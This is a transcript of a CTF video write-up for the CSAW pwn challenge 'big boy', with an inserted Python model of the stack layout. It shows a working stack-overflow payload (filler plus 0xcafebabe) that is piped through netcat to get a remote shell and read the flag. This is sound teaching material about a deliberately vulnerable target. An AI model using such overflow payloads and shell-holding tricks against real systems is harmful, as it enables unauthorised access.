Hey YouTube, this is a video write-up for the challenge "big boy" from CSAW CTF, in the Pwn or Binary Exploitation category. The challenge prompt is just "Only big boy pwners will get this one." It gives us a little netcat command to connect to the real service and a binary to download, so if you wanted to you could wget it; I just have it in my current directory right now. It is just a 64-bit executable. Let's mark it as executable so we can work with it, and run it. It says "Are you a big boy?" and I'm just going to say yes, and it gives me the date and nothing else. Weird, but that's all. Let's do some reconnaissance and look at the strings in here. We can see /bin/date, so it must be running that command, and in the same way there's a /bin/bash somewhere in there, plus system and read and everything, so we've got the potential to maybe run bash, or run a shell, here. What I actually did is open it up in Hopper. You can download it from hopperapp.com if you want to get it; it doesn't cost too much money. The free version obviously doesn't cost a whole lot, but even the pro version does not cost that much. You can see the strings here, and if you want to jump to the cross-references you can just go to the main function like that, or check it out in the procedures on the side. And then, if you have the other version (I don't know if it's specific to the full version or also in the free version), if you hit Alt+Enter from the current procedure you can see the pseudo-code for it. So they give us a main function in something close to C. It declares some variables, displays "Are you a big boy?" on the screen, tries to read into a variable, var_30, and then tests whether 0xdeadbeef is equal to 0xcafebabe. If that's true, it'll run bash.
Otherwise it'll run date. I looked at this and thought it was really, really weird, because why would it test two constants that are obviously different and decide whether or not they are equal to each other? I thought this was very strange, because the compiler wouldn't even have included this code if it was never going to get there. So I thought something strange was going on, and for that reason I checked it out in another disassembler; I just ran objdump on it. If you wanted to, you could run radare2, which is a much smarter move, but I'm not that smart, at least not yet; hopefully I'll learn a lot more about radare2. I just jumped to the main function and checked it out, and I could see it is calling puts and it is calling read, just as we saw in the pseudo-decompilation Hopper gave us. But after the read, a value from the stack is loaded into EAX, and then EAX is compared to 0xcafebabe. So it's something we can influence through that read that actually determines whether we go to run_cmd with bash or run_cmd with date. The 0xdeadbeef in the pseudo-code is just the initial value of that stack variable; the decompiler propagated the constant into the comparison, which is why it looked like two constants being compared. So all we need to do, essentially, is get 0xcafebabe to the point where we're overflowing var_30 (or whatever we're actually testing here) and it lands in the variable being checked, to run /bin/bash. Let's go ahead and do that. I'm going to use Python here and pwntools, so `import pwn` just to see what this hexadecimal value is in little-endian: p32(0xcafebabe). We can copy that, and then if we wanted to we could use Python to simply print it out, `python -c 'print ...'`, and now we have the bytes that we'll give to the program, to big boy. But we need to include padding up to where we actually start to overflow into var_30, or whatever we're testing to determine if EAX equals 0xcafebabe.
You can see in the read call here that we're reading in however many bytes the size argument at the very end says: 0x18. If you pump 0x18 into Python you can check how big that buffer would originally be: 24. Okay, let's try a little machine-gun spread, or a little spray, to determine which index actually gives us the overwrite with 0xcafebabe. What I do in this case is a little for loop, `for i in` a range, let's go 20 to 28, in which case we echo the occurrence we're working on and then print "A" times $i, the value we're working with, and then obviously the 0xcafebabe bytes pumped in at the end, and `done`. Hopefully me saying that aloud made some sense: we're doing a for loop to iterate through numbers where we could possibly hit and fill the position that ends up in EAX with 0xcafebabe, so we run bash instead of date. I'm just testing which number we do not receive date on, so I display our iterator on the screen with echo. I run through this, crank crank crank, and at 28, 27, all of these occurrences it looks like we're still getting date displayed. But 20 does not have date displayed. So okay, maybe we can just print "A" times 20 and then add in our payload, and it doesn't display date. So it must be opening up a shell for us, but the shell is being closed immediately. What we have to do is capture it and try to hold it, because once that bash shell opens up it's waiting for input from standard input, but we're using a pipe here, and as soon as the Python process exits the pipe hits end-of-file and we've pretty much just killed it. So we need to capture it.
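The offset sweep above, as an added example that is not code from the video: it models the stack region that read() writes into and replays the spray loop against that model, so it can be run offline. The 0x18 read length and the two constants come from the walkthrough; the 20-byte gap between the buffer and the check word is an assumption chosen to match the result the video found (offset 20 works, 21 through 28 do not), not something read off the binary. It packs the magic value with the built-in struct module rather than pwntools' p32, which is the alternative the video mentions at the end; the two produce the same four bytes.

```python
import struct

# Values taken from the walkthrough's disassembly.
READ_LEN = 0x18         # read(0, buf, 0x18): at most 24 bytes are copied
MAGIC = 0xCAFEBABE      # the check word must hold this to reach run_cmd("/bin/bash")
INITIAL = 0xDEADBEEF    # what the check word holds before our input lands

# Assumption for the model (not read off the binary): 20 bytes of buffer sit
# directly below the 4-byte check word, which is what "offset 20 works" implies.
BUF_LEN = 20


def build_payload(offset, value=MAGIC):
    """Filler up to `offset`, then `value` packed little-endian (same bytes as pwntools p32)."""
    return b"A" * offset + struct.pack("<I", value)


class BigBoyModel:
    """Constructed stand-in for the target's stack frame, for testing offsets offline.

    Layout: [buf_len bytes of buffer][4-byte check word][any slack read() could still reach].
    run() mimics read(0, buf, read_len) followed by `if (check == MAGIC)`.
    """

    def __init__(self, buf_len=BUF_LEN, read_len=READ_LEN):
        self.buf_len = buf_len
        self.read_len = read_len

    def run(self, payload):
        # The region read() may write: buffer, check word, and whatever lies beyond
        # the check word if read_len is larger than buffer + check.
        slack = max(0, self.read_len - self.buf_len - 4)
        frame = bytearray(self.buf_len) + bytearray(struct.pack("<I", INITIAL)) + bytearray(slack)
        n = min(len(payload), self.read_len)     # read() never copies more than its size argument
        frame[:n] = payload[:n]
        check, = struct.unpack_from("<I", frame, self.buf_len)
        return "/bin/bash" if check == MAGIC else "/bin/date"


def find_offsets(target, lo=0, hi=28):
    """The walkthrough's spray loop: try each filler length, keep the ones that don't yield date."""
    return [off for off in range(lo, hi + 1) if target(build_payload(off)) == "/bin/bash"]


if __name__ == "__main__":
    model = BigBoyModel()
    print("little-endian magic:", build_payload(0))
    print("working offsets 0..28:", find_offsets(model.run))
    print("offset 20 runs:", model.run(build_payload(20)))
```

The read length is the important bound here: 24 bytes is exactly a 20-byte buffer plus the 4-byte check word, so only offset 20 lines the value up (19 leaves the high byte short, 21 gets the last byte truncated away), and nothing past the check word is reachable, which is why there is no return-address control to worry about and the magic value is the whole solve. Against the real binary the spacing between the buffer and the check word is whatever the compiler chose, which is why the video sweeps offsets instead of trusting the pseudo-code; the model's buf_len parameter lets you watch the sweep adapt to a different layout.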
A cool way we can do that is to run `cat` after we've sent the payload, so standard input remains open and we can actually work with the shell we've got. I just wrap the two commands in parentheses and use a semicolon to separate them: `(python -c '...'; cat) | ./bigboy`. Now I can run ls, I can run whoami, and I could cat the flag if we were working with the real netcat service. So let's do that: take this payload (not really an exploit, so to speak) and pipe it to the netcat command we were given, so now we're working with the remote service, not just our local binary. Once we're given "Are you a big boy?" we supposedly have a shell we can work with, so we can look around, say whoami, but obviously there's a flag here we want to grab, so let's cat flag.txt. And we've got the flag. Sweet. You can save this in a flag.txt if you want, paste it in there, and keep a copy of our work; and maybe save the solution as a simple get_shell script or something so you don't lose track of it. But the real takeaways from this are simply using pwntools, and if you didn't use pwntools to get 0xcafebabe in little-endian, you can do it with the struct module in Python, because that's built in; you don't have to install pwntools for that. You can just do struct.pack with the format specifier as a string, the less-than symbol for little-endian and a capital I for a 4-byte unsigned integer, and paste in our hex value as the other argument, and again we've got the little-endian representation, so we can print out the raw bytes. Cool. Hope you guys enjoyed this one. Hey, quick shout out to the people that support me on Patreon. This list is getting so much longer and it's incredible; it's really surreal.
So thank you guys so much, I can't say it enough. $1 a month on Patreon will give you a special shout out just like this at the end of every video. $5 or more on Patreon will give you early access to everything that's released on YouTube before it goes live. So if I record a bunch of videos in bulk, and I usually just have YouTube gradually schedule them to be released over time, you don't have to wait; you can get the content right when it's ready, for just $5 a month. Thanks. If you did like this video, please like, comment and subscribe, and join our Discord server. It's a cool community full of CTF players, programmers and hackers. We're going to be playing a lot of CTFs together; we're actually trying to form one big Discord team when we can and when it's okay, and otherwise we'll just divide into smaller teams to play the games that have a team cap. So what are we looking at? CSAW Red coming up this weekend, then we're going to be looking at picoCTF and everything else that's coming down the pipeline. So please do join; we're going to have a great time. Thanks again, guys. Hope to see you on Patreon. Hope to see you in the next video. Love you. Bye.